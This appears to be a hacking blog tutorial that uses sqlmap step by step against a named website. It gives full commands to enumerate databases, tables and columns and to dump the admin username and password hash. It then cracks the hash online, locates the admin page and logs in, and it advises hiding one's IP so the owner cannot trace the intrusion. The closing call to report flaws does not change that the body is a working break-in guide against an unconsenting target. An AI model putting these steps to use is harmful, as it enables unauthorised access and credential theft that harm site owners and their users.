Intro – sqlmapis an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
1. Discover Databases
In this step sqlmap shall be used to find out what databases exist on the target.
Syntax – sqlmap –u target url –dbs
Ex – sqlmap –u www.muandme.net/product.php?id=9 –dbs
In this Image you can see after running this command we got some useful information like ‘GET parameter id might be injectable (Possible dbms : MySQL).’ This shows there is way for hacking this website. As a security researcher we can say there is a vulnerability so a bad guy can harm this. Lets go to next process simply write ‘y’ and hit enter.
(click on image for large view)
2. Write ‘n’ and hit enter if everything is well than you will see the next step simply write ‘y’ and hit enter. I am not going to tell you why we are writing somewhere y and n. Just read what they are asking and what do you want to do and answer them to do that.
3. write ‘y’ and hit enter.
4. Here we got available databases on our target. Now we have two databases ‘information_schema’ and ‘muandme.’ If you wish write down this on notepad or somewhere for future work.
5. Find tables in the database
Now its time to find out what tables exist in a particular database. Let’s say the database of interest over here is 'muandme' but you should experiment with both. You will get lots of information about your target. For now we will go with only muandme.
Syntax – sqlmap –u target url –D target database – tables
Ex – sqlmap –u www.muandme.net/product.php?id=9 –D muandme –tables
6. Finding Table on process…..
7. Here we got 19 tables in our target database. Now you have to use your sharp mind and find out which tables should you choose so you will get the ID or password. Here we are choosing admin because it seems there is something devil material.
8. Get columns of a table
We have the list of tables with us, and now get the columns of admin table.
Syntax - sqlmap –u target url –D target database –T target table –columns
Ex - sqlmap –u www.muandme.net/product.php?id=9 –D muandme –T admin –columns
9. Finding Columns on process…
10. We got 3 columns in our target table ‘admin.’
11. Get data of the table
Now comes the most interesting part, of extracting the data from the table. First of all we are running command for username.
Syntax – sqlmap –u target url –D target database –T target table –C target column –dump
Ex - sqlmap –u www.muandme.net/product.php?id=9 –D muandme –T admin –C username –dump
12. Here we got the username and it is admin.
13. Again we are going to dump the password column to find what is there in this column so use same command like we had use for the column ‘username’
Syntax – sqlmap –u target url –D target database –T target table –C target column –dump
Ex - sqlmap –u www.muandme.net/product.php?id=9 –D muandme –T admin –C password --dump
14. While dumping the column we got a hash as a password. Note down this hash for future.
15. As you know we got a hash password so now in this step sqlmap is giving you an option to crack this hash with dictionary –based attack. As we all know dictionary attack takes very long time but just to show you how it works I am writing ‘y’ and hitting enter for next process. Now this is showing 3 option for us. Simply go with default dictionary so write ‘1’and hit enter. Again write ‘y’ and hit enter. In the green fonts you can see it is trying to crack the hash.
16. After some time I realize this is really a bad idea to crack this hash with a dictionary so I just stopped it by pressing ctrl + c as result it is showing no clear password found and also it showing the uncracked hash.
17. Lets break this hash with some external help . So open www.md5decrypter.co.uk in your browser than write the hash in the MD5 Hashes field (visit image), fill captcha and click on Decrypt Hashes.
18. After sometime we cracked this hash and as you can see we have the original passwordnow.
19. Now let’s find out the admin page of our target url by using kali linux or there are many website which can find it easily for you. Follow image for more..
20. we are finding target’s admin page by using a website and here we got it. The green one is our admin page.
21. If you will take look of your work chart you will see that now we have everything for going to login as an admin. Let’s Make a list what we have right now in our hand.
(i) Our target’s Admin Page
(ii) Admin username
(iii) Admin Password
Now we just need to login. but we are forgetting one thing which is our IP Address. Yes, we need to Hide our IP so our opposite party could not trace us. Use a program for hiding your IP and test your SQLMAP skill. As you can see on this image we have successfully logged in and feeling like a devil but don’t do anything like devil. Be an angel and repot it to owner that your security is weak that’s it. Don’t show off your talent, respect your talent.
(click on image for large view)
Note – I am not responsible for any illegal activity. Don’t harm any website. If you found any vulnerability just report them to their IT department believe me you will feel happy to help them.
No comments:
Post a Comment